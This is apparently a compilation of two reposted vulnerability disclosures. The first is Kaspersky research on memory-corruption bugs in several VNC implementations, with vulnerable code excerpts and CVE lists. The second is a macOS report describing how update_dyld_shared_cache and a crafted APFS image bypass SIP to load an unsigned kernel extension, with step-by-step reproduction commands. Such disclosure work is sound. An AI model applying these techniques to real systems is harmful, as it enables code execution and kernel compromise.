  4. VNC vulnerability research Download PDF version 22 November 2019 Preparing for the research System description Possible attack vectors Objects of research Prior research Research findings LibVNC TightVNC TurboVNC UltraVNC CVE-2018-15361 CVE-2019-8262 Conclusion In this article, we discuss the findings of research which covered several different implementations of a remote access system called Virtual Network Computing (VNC). As a result of this research, we identified a number of memory corruption vulnerabilities, which have been assigned a total of 37 CVE identifiers. Some of the vulnerabilities identified, if exploited, could lead to remote code execution. Preparing for the research The VNC system is designed to provide one device with remote access to another device’s screen. It is worth noting that the protocol’s specification does not limit the choice of OS and allows cross-platform implementations. There are implementations both for common operating systems – GNU/Linux, Windows, Android – and for exotic ones. VNC has become one of the most widespread systems of its kind, thanks in part to cross-platform implementations and open-source licenses. The exact number of installations is hard to estimate. Based on data from shodan.io, over 600,000 VNC servers are available online. If you add those devices which are only available on the local network, it can be confidently assumed that the total number of VNC servers in use is many times (perhaps by orders of magnitude) greater. According to our data, VNC is actively used in industrial automation systems. We have recently published an article on the use of remote administration tools in industrial control systems on our website. It is estimated in the article that various remote administration tools (RAT), including VNC, are installed on about 32% of industrial control system computers. In 18.6% of all cases, RATs are included in ICS software distribution packages and are installed with that software. The remaining 81.4% were apparently installed by honest or not-so-honest employees of these enterprises or their contractors. In an article published on our website, we described attacks we had analyzed, in which the attackers had installed and used remote administration tools. Importantly, in some cases the attackers exploited vulnerabilities in remote administration tools as part of their attack scenarios. According to our estimates, most ICS vendors implement remote administration tools for their products based on VNC rather than any other system. This made an analysis of VNC security a high-priority task for us. In 2019, the BlueKeep vulnerability (CVE-2019-0708) in Windows RDP (Remote Desktop Services) triggered an emotional public response. The vulnerability enabled an unauthorized attacker to achieve remote code execution with SYSTEM privileges on a Windows machine on which the RDP server was running. It affected ‘junior’ versions of the operating system, such as Windows 7 SP1 and Windows 2008 Server SP1 and SP2. Some VNC server components in Windows are implemented as services that provide privileged access to the system, which means they themselves also have high-level access to the system. This is one more reason for prioritizing research on the security of VNC. System description VNC (Virtual Network Computing) is a system designed to provide remote access to the operating system’s user interface (desktop). 
VNC uses the RFB (remote frame buffer) protocol to transfer screen images, mouse movement and keypress events between devices. As a rule, each implementation of the system includes a server component and a client component. Since the RFB protocol is standardized, different implementations of the client and server parts are interchangeable. The server component sends the image of the server’s desktop to the client for viewing and the client in turn transmits client-side events (such as mouse cursor movements, keypresses, data copying and pasting via the cut buffer) back to the server. This enables the user on the client side to work on the remote machine where the VNC server is running. The VNC server sends an image every time the remote machine’s desktop is updated, which can occur, among other things, as a result of the client’s actions. Sending a new complete screenshot over the network is obviously a relatively resource-intensive operation, so instead of sending the entire screenshot the protocol updates those pixels which have changed as a result of some actions or events. RFB also supports several screen update compression and encoding methods. For example, compression can be performed using zlib or RLE (run-length encoding). Although the software is designed to perform a simple task, it has sufficiently extensive functionality for programmers to make mistakes at the development stage. Possible attack vectors Since the VNC system consists of server and client components, below we look at two main attack vectors: An attacker is on the same network with the VNC server and attacks it to gain the ability to execute code on the server with the server’s privileges. A user connects to an attacker’s ‘server’ using a VNC client and the attacker exploits vulnerabilities in the client to attack the user and execute code on the user’s machine. Attackers would without doubt prefer remote code execution on the server. However, most vulnerabilities are found in the system’s client component. In part, this is because the client component includes code designed to decode data sent by the server in all sorts of formats. It is while writing data decoding components that developers often make errors resulting in memory corruption vulnerabilities. The server part, on the other hand, can have a relatively small codebase, designed to send encoded screen updates to the user and handle events received from the client side. According to the specification, the server must support only six message types to provide all the functions required for its operation. This means that most server components have almost no complicated functionality, reducing the chances of a developer making an error. However, various extensions are implemented in some systems to augment the server’s functionality, such as file transfer, chat between the client and the server, and many others. As our research demonstrated, it is in the code designed to augment the server’s functionality that the majority of errors were made. Objects of research We selected the most common VNC implementations for our research: LibVNC – an open-source cross-platform library for creating a custom application based on the RFB protocol. The server component of LibVNC is used, for example, in VirtualBox to provide access to the virtual machine via VNC. UltraVNC – a popular open-source VNC implementation developed specifically for Windows. 
Recommended by many industrial automation companies for connecting to remote HMI interfaces over the RFB protocol (see, for example, here and here). TightVNCX – one more popular implementation of the RFB protocol. Recommended by many industrial automation system vendors for connecting to HMI interfaces from *nix machines. TurboVNC – an open-source VNC implementation. Uses the libjpeg-turbo library to compress JPEG images in order to accelerate image transfer. As part of our research, we did not analyze the security of a very popular product called RealVNC, because the product’s license does not allow reverse engineering. Prior research Before beginning to analyze VNC implementations, it is essential to do reconnaissance and see what vulnerabilities have already been identified in each of them. In 2014, the Google Security Team published a small LibVNC vulnerability analysis report. Since the project includes a very small amount of code, it could be assumed that Google engineers had identified all vulnerabilities existing in LibVNC. However, I was able to find several issues on GitHub (for example, this and this), which were created later than 2014. The number of vulnerabilities identified in the UltraVNC project is not large. Most of these vulnerabilities have to do with the exploitation of a simple stack overflow with arbitrary length data being written to a fixed-size buffer on the stack. All known vulnerabilities were found a relatively long time ago. Since then, project codebase has grown, while the older codebase was found to include old vulnerabilities. Research findings LibVNC After analyzing previously identified vulnerabilities, I fairly easily found variants of some of these vulnerabilities in the code of the extension providing file transfer functionality. The extension is not enabled by default: developers must explicitly allow it to be used in their LibVNC based projects. This is probably why these vulnerabilities had not been identified before. Next, I moved on from analyzing server code to researching the client part. It was there that I found vulnerabilities which had the most critical importance for the project and which were also quite diverse. Among the vulnerabilities identified, it is worth mentioning several classes of vulnerabilities that will also come up in other projects based on the RFB protocol. It can be said that each of these classes was made possible by the way the protocol’s specification is designed. More precisely, the protocol’s specification is designed in a way that does not guard developers against these classes of bugs, enabling such flaws to appear in the code. As an illustration of this point, you can look at the structures used in VNC projects to handle network messages. For example, open the rfbproto.h file, which has been used by generations of VNC project developers since 1999. The file is included in the LibVNC project, among others. An excellent example for demonstrating the first class of vulnerabilities is the rfbClientCutTextMsg structure, which is used to send information on cut buffer changes on the client to the server. 1 2 3 4 5 6 7 typedef struct { uint8_t type; /* always rfbClientCutText */ uint8_t pad1; uint16_t pad2; uint32_t length; /* followed by char text[length] */ } rfbClientCutTextMsg; After establishing a connection and performing an initial handshake, during which the client and the server agree to use specific screen settings, all messages transferred have the same format. 
Each message starts with one byte, which represents the message type. Depending on message type, a message handler and structure matching the type are selected. In different VNC clients, the structure is filled in more or less in the same way (pseudocode in C): 1 ReadFullData(socket, ((char *)&msg) + 1, sz_rfbServerSomeMessageType – 1); In this way, the entire message structure is filled in, with the exception of the first byte, which defines the message type. It can be seen that all fields in the structure are controlled by the remote user. It should also be noted that msg is a union, which consists of all possible message structures. Since the contents of the cut buffer has an unspecified length, memory will be allocated for it dynamically, using malloc . It should also be remembered that the cut buffer field should presumably contain text and it is customary to terminate text data with the zero character in the C language. Given all this, as well as the fact that the field length has the type uint32_t and is fully controlled by the remote user, in this case we have a typical integer overflow (pseudocode in C): 1 2 3 char *text = malloc(msg.length + 1); ReadFullData(socket, text, msg.length); text[msg.length] = 0; If an attacker sends a message length field with a value equal to UINT32_MAX = 232– 1 = 0xffffffff, the function malloc(0) will be called as a result of an integer overflow. If the standard glibc malloc memory allocation mechanism is used, the call will return a chunk of the smallest possible size – 16 bytes. At the same time, a length equal to UINT32_MAX will be passed to the ReadFullData function as an argument, which, in the case of LibVNC, will result in a heap-based buffer overflow. The second vulnerability type can be demonstrated on the same structure. As one can read in the specification or the RFC, some structures include padding for field alignment. However, from a security researcher’s viewpoint, this is just one more opportunity to discover a memory initialization error (see here and here). Let’s have a look at this typical error (pseudocode in C): 1 2 3 4 5 rfbClientCutTextMsg cct; cct.type = rfbClientCutText; cct.length = length; WriteToRFBServer(socket, &cct, sz_rfbClientCutTextMsg); WriteToRFBServer(socket, str, len); The message structure is created on the stack, after which some of its fields are filled in and the structure is sent to the server. It can be seen that the structures pad1 and pad2 remain empty. As a result of this, an uninitialized variable is sent over the network and an attacker can read uninitialized memory from the stack. If the attacker is in luck, the memory area that the attacker is able to access may contain the address of the heap, stack or text section, enabling the attacker to bypass ASLR and use overflow to achieve remote code execution on the client. Such trivial vulnerabilities have been found in VNC projects sufficiently often, which is why we decided to place them into separate classes. It is worth noting that analyzing such projects as LibVNC, which are positioned as cross-platform solutions, is not an easy task. While doing research on such projects, one should ignore anything that has to do with the specific OS and architecture of the researcher’s computer and view the project exclusively through the prism of the C language standard, otherwise it’s easy to miss some obvious flaws in code, which can only be reproduced on a specific platform. 
For example, in this case, the heap overflow vulnerability was incorrectly fixed on the 32 bit platform because the size or the size_t type on the x86_64 platform is different from the same type’s size on the 32 bit x86 platform. Information on all vulnerabilities identified was provided to developers and the vulnerabilities were closed (some even twice, thanks to Solar Designer for the help). TightVNC The next target for research was a fairly popular VNC client implementation for GNU/Linux. I was able to identify vulnerabilities in that system very quickly, because most were fairly straightforward and some were identical to those found in LibVNC. Two code fragments from two different projects are compared below. Originally, this vulnerability was identified in the LibVNC project, in the CoRRE decoding method (see code on the right-hand side). In the above code fragment, data of arbitrary length is read to a fixed-length buffer inside the rfbClient structure. This naturally results in buffer overflow. By a curious coincidence, function pointers are located inside the structure, almost right after the cut buffer, which almost immediately results in code execution. It can be observed that, with the exception of some minor variations, the code fragments from LibVNC and TightVNC can be considered identical. Both fragments were copied from the AT&T Laboratories. The developers introduced this vulnerability back in 1999. (I was able to determine this through the AT&T Laboratories license, in which developers usually specify who was involved in the development project during different time periods.) That code has been modified several times since then – for example, in LibVNC the static global buffer was moved to the client’s structure – but the vulnerability survived all the modifications. It is also worth noting that HandleCoRREBPP is a rather original name. If you search the code of projects on GitHub for this character combination, you can find lots of VNC-related projects that thoughtlessly copied the vulnerable decoding function carrying this name or the entire LibVNC library. This is why these projects may remain vulnerable forever – unless the developers update the contents of their projects or fix the vulnerability in the code themselves. The character combination HandleCoRREBPP is in fact not a function name. BPP in this case stands for “Bits per Pixel” and is a number equal to 8, 16 or 32, depending on the color depth agreed on by the client and the server at the initialization stage. It is assumed that developers will use this file as an auxiliary file in their macros as follows: 1 2 3 4 5 #ifndef HandleCoRRE8 #define BPP 32 #include ”corre.h” #undef BPP #endif The result is several functions: HandleCoRRE8, HandleCoRRE16 and HandleCoRRE32. Since the program was originally written in C rather than C++, the developers had to come up with such tricks because there were no templates available. However, if you google the function name HandleCoRRE or HandleCoRRE32, you may discover that there are projects which were slightly modified, either using or not using patterns, but which still contain the vulnerability. Unfortunately, there are hundreds of projects in which this code was included without any changes or copied and it is not always possible to contact their developers. The sad story of TightVNC does not end here. 
When we reported the vulnerabilities to TightVNC developers, they thanked us for the information and let us know that they had discontinued the development of the TightVNC 1.X line and no longer fixed any vulnerabilities found, because it had become uneconomical for their company. At some point, GlavSoft began to develop a new line, TightVNC 2.X, which does not include any GPL-licensed third-party code and which can therefore be developed as a commercial product. It should be noted that TightVNC 2.X for Unix systems is distributed only under commercial licenses and should not be expected to be released as open source software. We reported the vulnerabilities identified in TightVNC oss-security and emphasized that package maintainers needed to fix these vulnerabilities by themselves. Although we sent our notification to package maintainers in January 2019, the vulnerabilities had not been fixed at the time of this article’s publication (November 2019). TurboVNC This VNC project deserves a special ‘prize’: the one vulnerability identified in it is mind-boggling. Consider a C code fragment taken from the main server function designed to handle user messages: 1 2 3 4 5 6 7 8 9 char data[64]; READ(((char *)&msg) + 1, sz_rfbFenceMsg – 1) READ(data, msg.f.length) if (msg.f.length > sizeof(data)) rfbLog("Ignoring fence. Payload of %d bytes is too large.\n", msg.f.length); else HandleFence(cl, flags, msg.f.length, data); return; This code fragment reads a message in the rfbFenceType format. The message provides the server with information on the length msg.f.length of type uint8_t user data, which follows the message. This is obviously the case of arbitrary user data being read into a fixed-size buffer, resulting in stack overflow. Importantly, a check of the length of the data read is performed after the data has been read into the buffer. Due to the absence of overflow protection on the stack (a so-called canary), this vulnerability makes it possible to control return addresses and, consequently, to achieve remote code execution on the server. An attacker would, however, first need to obtain authentication credentials to connect to the VNC server or gain control of the client before the connection is established. UltraVNC In UltraVNC, I was able to identify multiple vulnerabilities in both the server and the client components of the project, to which 22 CVE IDs were assigned. A distinguishing feature of this project is its focus on Windows systems. When analyzing projects that can be compiled for GNU/Linux, I prefer to take two different approaches to vulnerability search. First, I analyze the code, looking for vulnerabilities in it. Second, I try to figure out how the search for vulnerabilities in the project can be automated using fuzzing. This is what I did when analyzing LibVNC, TurboVNC, and TightVNC. For such projects, it is very easy to write a wrapper for libfuzzer, since the project does not depend on a specific operating system’s implementation of the network API – there is an additional abstraction layer implemented for that. To write a good fuzzer, all you have to do is implement the target function on your own, as well as rewrite the networking functions. This will allow data from the fuzzer to be fed to the program – as if it was transferred over the network. However, in the case of analyzing projects for Windows, the latter technique is difficult to use even with open-source projects because the relevant tools are either not available or poorly developed. 
At the time of the analysis, libfuzzer for Windows had not yet been released. In addition, the event-oriented approach used in Windows application development means that a very large amount of code would have to be rewritten to achieve good fuzzing coverage. Because of this, I used only manual code analysis when analyzing UltraVNC for vulnerabilities. As a result of this analysis, I found an entire ‘zoo’ of vulnerabilities in UltraVNC – from trivial buffer overflows in strcpy and sprintf to more or less curious vulnerabilities that can rarely be encountered in real-world projects. Below we discuss some of these vulnerabilities. CVE-2018-15361 This vulnerability exists in UltraVNC client-side code. At the initialization stage, the server should provide information on display height and width, color depth, palette and name of the desktop, which can be displayed, for example, in the title bar of the window. The name of the desktop is a string of an undefined length. Consequently, the string’s length is sent to the client first, followed by the string itself. The relevant fragment of code is shown below: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 void ClientConnection::ReadServerInit() { ReadExact((char *)&m_si, sz_rfbServerInitMsg); m_si.framebufferWidth = Swap16IfLE(m_si.framebufferWidth); m_si.framebufferHeight = Swap16IfLE(m_si.framebufferHeight); m_si.format.redMax = Swap16IfLE(m_si.format.redMax); m_si.format.greenMax = Swap16IfLE(m_si.format.greenMax); m_si.format.blueMax = Swap16IfLE(m_si.format.blueMax); m_si.nameLength = Swap32IfLE(m_si.nameLength); m_desktopName = new TCHAR[m_si.nameLength + 4 + 256]; m_desktopName_viewonly = new TCHAR[m_si.nameLength + 4 + 256+16]; ReadString(m_desktopName, m_si.nameLength); . . . } The attentive reader will make the correct observation that the above code contains an integer overflow vulnerability. However, in this case the vulnerability leads not to heap-based buffer overflow in the ReadString function but to more curious consequences. 1 2 3 4 5 6 void ClientConnection::ReadString(char *buf, int length) { if (length > 0) ReadExact(buf, length); buf[length] = '\0'; } It can be seen that the ReadString function is designed to read a string of the length length and terminate it with a zero. It is worth noting that the function takes the signed type as its second argument. If we specify a very large number in m_si.nameLength, it will be treated as a negative number when passed to the ReadString function as an argument. This will result in length failing the positivity check and the buf array remaining unitialized. Only one thing that will happen: a null byte will be written at offset buf + length. Given that length is a negative number, this makes it possible to write the null byte at a fixed negative offset relative to buf. The upshot of this is that if an integer overflow occurs when allocating m_desktopName and the buffer is allocated on the regular heap of the process, this will make it possible to write the null byte to the previous chunk. If an integer overflow does not occur and the system has sufficient memory, a large buffer will be allocated, with a new heap allocated for it. With the right parameters, a remote attacker would be able to write a null byte to the _NT_HEAP structure, which will be located directly before a huge chunk. This vulnerability is guaranteed to cause a DoS, but the question of the ability to achieve remote code execution remains open. 
I wouldn’t rule out that experts in exploiting the Windows userland heap could turn this vulnerability into an RCE if they wanted to. CVE-2019-8262 The vulnerability was identified in the handler of data encoded using the Ultra encoding. It demonstrates that the security and availability of this functionality really hung by a very thin thread. The handler uses the lzo1x_decompress function from the minilzo library. To understand what the vulnerability is, one has to look at the prototypes of compression and decompression functions. To call the decompression function, one has to pass the buffer containing compressed data, compressed data length, the buffer to which the data should be unpacked and its length as inputs. It should be kept in mind that the function may return an error if the input data cannot be decompressed. In addition, the developer needs to know the exact length of the data that will be unpacked to the output buffer. This means that, in addition to the error code, the function should return a value equal to the number of bytes written. For example, the argument that is used to pass the write buffer length can be used for this, provided that it is passed by pointer. In that case the minimum interface of the decompression function will look as follows: 1 int decompress(const unsigned char *in, size_t in_len, unsigned char *out, size_t *out_len) The first four parameters of this function are the same as the first four parameters of the lzo1x_decompress function. Now consider the fragment of UltraVNC code that contains the critical heap overflow vulnerability. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 void ClientConnection::ReadUltraRect(rfbFramebufferUpdateRectHeader *pfburh) { UINT numpixels = pfburh->r.w * pfburh->r.h; UINT numRawBytes = numpixels * m_minPixelBytes; UINT numCompBytes; lzo_uint new_len; rfbZlibHeader hdr; // Read in the rfbZlibHeader omni_mutex_lock l(m_bitmapdcMutex); ReadExact((char *)&hdr, sz_rfbZlibHeader); numCompBytes = Swap32IfLE(hdr.nBytes); CheckBufferSize(numCompBytes); ReadExact(m_netbuf, numCompBytes); CheckZlibBufferSize(numRawBytes); lzo1x_decompress((BYTE*)m_netbuf,numCompBytes,(BYTE*)m_zlibbuf,&new_len,NULL); . . . } As you can see, UltraVNC developers do not check the lzo1x_decompress return code, which is, however, insignificant compared to another flaw – the improper use of new_len. The uninitialized variable new_len is passed to the lzo1x_decompress function. At the time of calling the function, the variable should be equal to the length of the m_zlibbuf buffer. In addition, while debugging vncviewer.exe (the executable file was taken from a build on the UltraVNC official website), I was able to find out why this code had passed the testing stage. It turned out that the problem was that, since the variable new_len was not initialized, it contained a large text section address value. This made it possible for a remote user to pass specially crafted data to the decompression function as inputs to ensure that the function, when writing to the m_zlibbuf buffer, would write the data beyond the buffer’s boundary, resulting in heap overflow. Conclusion In conclusion, I would like to mention that while doing the research I often couldn’t help thinking that the vulnerabilities I found were too unsophisticated to have been missed by everyone before. However, it was true. Each of these vulnerabilities had a very long lifetime. 
Some of the vulnerability classes identified in the study are present in a large number of open-source projects, surviving even codebase refactoring. I believe it is very important to be able to systematically identify such sets of vulnerable projects containing vulnerabilities that are not always inherited in clear ways. Almost none of the projects analyzed are unit tested; programs are not systematically tested for security using static code analysis or fuzzing. Magic constants that are abundant in code make it similar to a house of cards: just one constant changed in this unstable structure could result in a new vulnerability. Here are our recommendations for developers and vendors that use third-party VNC project code in their products: Set up a bug tracking mechanism in all third-party VNC projects used and regularly update their code to the latest release. Add compilation options that make it harder for attackers to exploit any vulnerabilities that may exist in the code. Even if researchers are not able to identify all the vulnerabilities in a project, exploiting them should be made as difficult as possible. For example, some of the vulnerabilities described in this article would be impossible to exploit to achieve remote code execution if the project was compiled as a position-independent executable (PIE). In that case, the vulnerabilities would remain, but their exploitation would lead to denial of service (DoS) rather than RCE. Another example is the unfortunate experience with TurboVNC: the compiler can sometimes optimize the procedure of checking the stack canary. Some compilers perform such optimizations by removing stack canary checks from the functions that don’t have explicitly allocated arrays. However, the compiler could make a mistake and fail to check for the presence of a buffer in some of the structures on the stack or in switch-case statements (which is what probably happened in the case of TurboVNC). To make it impossible to exploit a vulnerability that has been identified, the compiler should be explicitly told that the stack canary checking procedure should not be optimized. Perform fuzzing and testing of the project on all architectures for which the project is made available. Some vulnerabilities may manifest themselves only on one of the platforms due to its specific features. Be sure to use sanitizers in the process of fuzzing and at the testing stage. For example, a memory sanitizer is guaranteed to identify such vulnerabilities as the use if uninitialized values. On the positive side, password authentication is often required to exploit server-side vulnerabilities, and the server may not allow users to configure a password-free authentication method for security reasons. This is the case, for example, with UltraVNC. As a safeguard against attacks, clients should not connect to unknown VNC servers and administrators should configure authentication on the server using a unique strong password. 
On the positive side, password authentication is often required to exploit server-side vulnerabilities, and the server may not allow users to configure a password-free authentication method for security reasons. This is the case, for example, with UltraVNC. As a safeguard against attacks, clients should not connect to unknown VNC servers, and administrators should configure authentication on the server using a unique strong password.

The following vulnerabilities were registered based on this research:

LibVNC: CVE-2018-6307, CVE-2018-15126, CVE-2018-15127, CVE-2018-20019, CVE-2018-20020, CVE-2018-20021, CVE-2018-20022, CVE-2018-20023, CVE-2018-20024, CVE-2019-15681

TightVNC: CVE-2019-8287, CVE-2019-15678, CVE-2019-15679, CVE-2019-15680

TurboVNC: CVE-2019-15683

UltraVNC: CVE-2018-15361, CVE-2019-8258, CVE-2019-8259, CVE-2019-8260, CVE-2019-8261, CVE-2019-8262, CVE-2019-8263, CVE-2019-8264, CVE-2019-8265, CVE-2019-8266, CVE-2019-8267, CVE-2019-8268, CVE-2019-8269, CVE-2019-8270, CVE-2019-8271, CVE-2019-8272, CVE-2019-8273, CVE-2019-8274, CVE-2019-8275, CVE-2019-8276, CVE-2019-8277, CVE-2019-8280

To be continued…

Pavel Cheremushkin
Security Researcher, KL ICS CERT

Sursa: https://ics-cert.kaspersky.com/reports/2019/11/22/vnc-vulnerability-research/
5. Tested on macOS Mojave (10.14.6, 18G87) and Catalina Beta (10.15 Beta 19A536g).

On macOS, the dyld shared cache (in /private/var/db/dyld/) is generated locally on the system and therefore doesn't have a real code signature; instead, SIP seems to be the only mechanism that prevents modifications of the dyld shared cache. update_dyld_shared_cache, the tool responsible for generating the shared cache, is able to write to /private/var/db/dyld/ because it has the com.apple.rootless.storage.dyld entitlement. Therefore, update_dyld_shared_cache is responsible for ensuring that it only writes data from trustworthy libraries when updating the shared cache.

update_dyld_shared_cache accepts two interesting command-line arguments that make it difficult to enforce these security properties:

- "-root": Causes libraries to be read from, and the cache to be written to, a caller-specified filesystem location.
- "-overlay": Causes libraries to be read from a caller-specified filesystem location before falling back to normal system directories.

There are some checks related to this, but they don't look very effective. main() tries to see whether the target directory is protected by SIP:

    bool requireDylibsBeRootlessProtected = isProtectedBySIP(cacheDir);

If that variable is true, update_dyld_shared_cache attempts to ensure that all source libraries are also protected by SIP. isProtectedBySIP() is implemented as follows:

    bool isProtectedBySIP(const std::string& path)
    {
        if ( !sipIsEnabled() )
            return false;
        return (rootless_check_trusted(path.c_str()) == 0);
    }

Ignoring that this looks like a typical symlink race issue, there's another problem: looking in a debugger (with SIP configured so that only debugging restrictions and dtrace restrictions are disabled), it seems like rootless_check_trusted() doesn't work as expected:

    bash-3.2# lldb /usr/bin/update_dyld_shared_cache
    [...]
    (lldb) breakpoint set --name isProtectedBySIP(std::__1::basic_string<char,\ std::__1::char_traits<char>,\ std::__1::allocator<char>\ >\ const&)
    Breakpoint 1: where = update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&), address = 0x00000001000433a4
    [...]
    (lldb) run -force
    Process 457 launched: '/usr/bin/update_dyld_shared_cache' (x86_64)
    Process 457 stopped
    * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
        frame #0: 0x00000001000433a4 update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&)
    update_dyld_shared_cache`isProtectedBySIP:
    ->  0x1000433a4 <+0>: pushq %rbp
        0x1000433a5 <+1>: movq %rsp, %rbp
        0x1000433a8 <+4>: pushq %rbx
        0x1000433a9 <+5>: pushq %rax
    Target 0: (update_dyld_shared_cache) stopped.
    (lldb) breakpoint set --name rootless_check_trusted
    Breakpoint 2: where = libsystem_sandbox.dylib`rootless_check_trusted, address = 0x00007fff5f32b8ea
    (lldb) continue
    Process 457 resuming
    Process 457 stopped
    * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 2.1
        frame #0: 0x00007fff5f32b8ea libsystem_sandbox.dylib`rootless_check_trusted
    libsystem_sandbox.dylib`rootless_check_trusted:
    ->  0x7fff5f32b8ea <+0>: pushq %rbp
        0x7fff5f32b8eb <+1>: movq %rsp, %rbp
        0x7fff5f32b8ee <+4>: movl $0xffffffff, %esi ; imm = 0xFFFFFFFF
        0x7fff5f32b8f3 <+9>: xorl %edx, %edx
    Target 0: (update_dyld_shared_cache) stopped.
    (lldb) print (char*)$rdi
    (char *) $0 = 0x00007ffeefbff171 "/private/var/db/dyld/"
    (lldb) finish
    Process 457 stopped
    * thread #1, queue = 'com.apple.main-thread', stop reason = step out
        frame #0: 0x00000001000433da update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) + 54
    update_dyld_shared_cache`isProtectedBySIP:
    ->  0x1000433da <+54>: testl %eax, %eax
        0x1000433dc <+56>: sete %al
        0x1000433df <+59>: addq $0x8, %rsp
        0x1000433e3 <+63>: popq %rbx
    Target 0: (update_dyld_shared_cache) stopped.
    (lldb) print $rax
    (unsigned long) $1 = 1

Looking around with a little helper (under the assumption that it doesn't behave differently because it doesn't have the entitlement), it looks like only a small part of the SIP-protected directories show up as protected when you check with rootless_check_trusted():

    bash-3.2# cat rootless_test.c
    #include <stdio.h>

    int rootless_check_trusted(char *);

    int main(int argc, char **argv) {
      int res = rootless_check_trusted(argv[1]);
      printf("rootless status for '%s': %d (%s)\n", argv[1], res, (res == 0) ? "PROTECTED" : "MALLEABLE");
    }
    bash-3.2# ./rootless_test /
    rootless status for '/': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /System
    rootless status for '/System': 0 (PROTECTED)
    bash-3.2# ./rootless_test /System/
    rootless status for '/System/': 0 (PROTECTED)
    bash-3.2# ./rootless_test /System/Library
    rootless status for '/System/Library': 0 (PROTECTED)
    bash-3.2# ./rootless_test /System/Library/Assets
    rootless status for '/System/Library/Assets': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /System/Library/Caches
    rootless status for '/System/Library/Caches': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /System/Library/Caches/com.apple.kext.caches
    rootless status for '/System/Library/Caches/com.apple.kext.caches': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /usr
    rootless status for '/usr': 0 (PROTECTED)
    bash-3.2# ./rootless_test /usr/local
    rootless status for '/usr/local': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /private
    rootless status for '/private': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /private/var/db
    rootless status for '/private/var/db': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /private/var/db/dyld/
    rootless status for '/private/var/db/dyld/': 1 (MALLEABLE)
    bash-3.2# ./rootless_test /sbin
    rootless status for '/sbin': 0 (PROTECTED)
    bash-3.2# ./rootless_test /Applications/Mail.app/
    rootless status for '/Applications/Mail.app/': 0 (PROTECTED)
    bash-3.2#

Perhaps rootless_check_trusted() limits its trust to paths that are writable exclusively using installer entitlements like com.apple.rootless.install, or something like that? That's the impression I get when testing different entries from /System/Library/Sandbox/rootless.conf - the entries with no whitelisted specific entitlement show up as protected, the ones with a whitelisted specific entitlement show up as malleable. rootless_check_trusted() checks for the "file-write-data" permission through the MAC syscall, but I haven't looked in detail at how the policy actually looks.

(By the way, looking at update_dyld_shared_cache, I'm not sure whether it would actually work if the requireDylibsBeRootlessProtected flag is true - it looks like addIfMachO() would never add any libraries to dylibsForCache because `sipProtected` is fixed to `false` and the call to isProtectedBySIP() is commented out?)
In theory, this means it's possible to inject a modified version of a library into the dyld cache using either the -root or the -overlay flag of update_dyld_shared_cache, reboot, and then run an entitled binary that will use the modified library. However, there are (non-security) checks that make this annoying:

- When loading libraries, loadPhase5load() checks whether the st_ino and st_mtime of the on-disk library match the ones embedded in the dyld cache at build time.
- Recently, dyld started ensuring that the libraries are all on the "boot volume" (the path specified with "-root", or "/" if no root was specified).

The inode number check means that it isn't possible to just create a malicious copy of a system library, run `update_dyld_shared_cache -overlay`, and reboot to use the malicious copy; the modified library will have a different inode number. I don't know whether HFS+ reuses inode numbers over time, but on APFS, not even that is possible; inode numbers are monotonically incrementing 64-bit integers.

Since root (and even normal users) can mount filesystem images, I decided to create a new filesystem with appropriate inode numbers. I think HFS probably can't represent the full range of inode numbers that APFS can have (and that seem to show up on volumes that have been converted from HFS+ - that seems to result in inode numbers like 0x0fffffff00001666), so I decided to go with an APFS image. Writing code to craft an entire APFS filesystem would probably take quite some time, and the public open-source APFS implementations seem to be read-only, so I'm first assembling a filesystem image normally (create the filesystem with newfs_apfs, mount it, copy files in, unmount), then renumbering the inodes. By storing files in the right order, I don't even need to worry about allocating and deallocating space in tree nodes and such - all replacements can be performed in-place.

My PoC patches the cached version of csr_check() from libsystem_kernel.dylib so that it always returns zero, which causes the userspace kext loading code to ignore code signing errors. To reproduce:

- Ensure that SIP is on.
- Ensure that you have at least something like 8GiB of free disk space.
- Unpack the attached dyld_sip.tar (as normal user).
- Run ./collect.sh (as normal user). This should take a couple minutes, with more or less continuous status updates. At the end, it should say "READY" after mounting an image to /private/tmp/L. (If something goes wrong here and you want to re-run the script, make sure to detach the volume if the script left it attached - check "hdiutil info".)
- As root, run "update_dyld_shared_cache -force -root /tmp/L".
- Reboot the machine.
- Build an (unsigned) kext from source. I have attached source code for a sample kext as testkext.tar - you can unpack it and use xcodebuild - but that's just a simple "hello world" kext, you could also use anything else.
- As root, copy the kext to /tmp/.
- As root, run "kextutil /tmp/[...].kext".
You should see something like this:

    bash-3.2# cp -R testkext/build/Release/testkext.kext /tmp/ && kextutil /tmp/testkext.kext
    Kext with invalid signatured (-67050) allowed: <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" }
    Code Signing Failure: code signature is invalid
    Disabling KextAudit: SIP is off
    Invalid signature -67050 for kext <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" }
    bash-3.2# dmesg|tail -n1
    test kext loaded
    bash-3.2# kextstat | grep test
    120 0 0xffffff7f82a50000 0x2000 0x2000 net.thejh.test.testkext (1) A24473CD-6525-304A-B4AD-B293016E5FF0 <5>
    bash-3.2#

Miscellaneous notes:

